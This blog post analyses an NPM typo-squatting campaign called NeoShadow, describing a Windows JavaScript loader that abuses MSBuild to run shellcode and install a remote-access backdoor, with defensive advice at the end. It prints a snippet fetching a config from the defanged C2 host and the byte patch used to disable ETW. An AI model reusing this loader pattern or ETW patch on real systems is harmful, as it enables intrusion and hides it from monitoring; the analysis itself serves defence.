Menu

Decoding the NeoShadow NPM Supply Chain Attack: JavaScript Loaders, MSBuild Tricks & Crypto Risks

, , , , , , , , 0

8b26bcf0-413e-4b62-a5ad-0175d824fc22

Decoding the NPM Supply Chain Attack: JavaScript Loaders, MSBuild Tricks & Crypto Risks

In the fast-paced world of software development, supply chain attacks have become a major threat. On December 30th, a wave of suspicious NPM packages appeared from one author. These packages used common tricks like typo-squatting to fool developers. What made them stand out was the clever malware inside. We call this attack , named after clues in the code.

This NPM supply chain attack mixes JavaScript, MSBuild tools, and advanced evasion methods. It targets Windows users and sets up a sneaky backdoor. For crypto and blockchain developers who rely on NPM for Web3 projects, this is a wake-up call. A compromised package could steal private keys or inject bad code into dApps.

How the Attack Was Discovered

Security tools spotted these new NPM packages right away. All came from user cjh97123. They mimic popular packages with small spelling changes – a classic typo-squatting move. But the real surprise was in the payload.

The packages include a file called scripts/setup.js. This is a Windows-only loader with multiple stages. It uses heavy obfuscation that beats basic deobfuscators. After some work, we uncovered its steps:

  1. Check if running on Windows.
  2. Find MSBuild.exe paths.
  3. Fetch config from C2 server.
  4. Download and decrypt payload.
  5. Run shellcode via MSBuild and C# tricks.

This chain makes it hard to spot and stop.

Deobfuscating the JavaScript Loader

The setup.js code looks messy at first. But after deobfuscation, it reveals smart logic. It grabs a payload from https://metrics-flow[.]com/assets/js/analytics.min.js and decrypts it with RC4.

Key twist: It pulls _next/data/config.json from the C2 domain. This file has a cleaner MSBuild script. MSBuild is a Microsoft tool for building software. Attackers use it here to run C# code without raising alarms. This is a fresh way to deliver malware.

// Simplified deobfuscated snippet
fetch('https://metrics-flow[.]com/_next/data/config.json')
.then(res => res.text())
.then(msbuildXml => {
  // Build and execute via MSBuild
});

Why MSBuild? It blends in with legit dev tools. Perfect for targeting developers in crypto projects using Node.js.

Inside the Decrypted Shellcode: NeoShadow Revealed

The payload is shellcode. Digging into bytes shows strings like NeoShadowV2DeriveKey2026 and Global\NSV2_8e4b1d. "NS" stands for NeoShadow. The "V2" suggests a versioned toolkit. This names the threat actor .

Running it through Binary Ninja gives 4000 lines of rough C code. Tools like Claude clean it to 1900 readable lines. The result? A full backdoor RAT for long-term access.

The Backdoor’s Core Features

Once active, the implant:

  • Beacons to C2 every few minutes.
  • Sends system info: OS, user, processes.
  • Waits for commands.

C2 uses ChaCha20 encryption (fast stream cipher) with Curve25519 ECDH for key exchange. Secure and quick.

Operators get these commands:

Command What It Does
shell Run shell commands, get output.
upload Upload files to C2.
download Download files from C2.
module Load extra modules (keyloggers, etc.).

It’s lightweight: just a loader for bigger threats like ransomware.

Evasion Tricks to Dodge Detection

hides well:

Disabling ETW (Event Tracing for Windows)

ETW tracks .NET loads, PowerShell, processes. EDR tools love it. The malware patches NtTraceEvent in ntdll.dll:

  1. Hash-resolve function (hash 0xDECFC1BF).
  2. VirtualProtect to make writable.
  3. Overwrite first bytes: 48 33 C0 C3 (XOR RAX,RAX; RET).

ETW goes silent. Security tools see nothing.

C2 Camouflage

The domain metrics-flow[.]com (registered Dec 30, 2025) serves random fake web pages. Looks like a normal analytics site. Easy to spot repeats for researchers.

Version 2: Even Sneakier

On January 2, 2026, updated packages dropped. Changes:

  • New Windows exe: analytics.node. Zero AV hits on VirusTotal.
  • Harder JS obfuscation.
  • PDB path: C:\Users\admin\Desktop\NeoShadow\core\loader\native\build\Release\analytics.pdb. Confirms name.

This shows active development.

Why Crypto and Blockchain Devs Should Worry

NPM is huge in Web3. Tools like ethers.js, web3.js pull from it. A bad package could:

  • Steal wallet seeds.
  • Mine crypto covertly.
  • Inject backdoors in smart contract tools.

Supply chain hits like this bypass code reviews. SolarWinds showed the damage; now it’s open source too.

How to Protect Your Projects

  1. Check package age: Avoid fresh releases (under 24h).
  2. Scan with SAST/SCA: Tools catch bad code early.
  3. Use lockfiles: Pin versions.
  4. Monitor deps: Tools like Socket or npm audit.
  5. Airgap builds: For high-value crypto code.

Enable ETW monitoring and watch for MSBuild abuse.

Final Thoughts

The NPM supply chain attack is novel: JS to MSBuild to shellcode RAT. With custom C2 and evasion, it’s built for stealth. As blockchain grows, so do risks. Stay vigilant – scan, verify, and secure your chain.

This threat proves supply chain attacks evolve fast. Share if you spot similar packages!

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *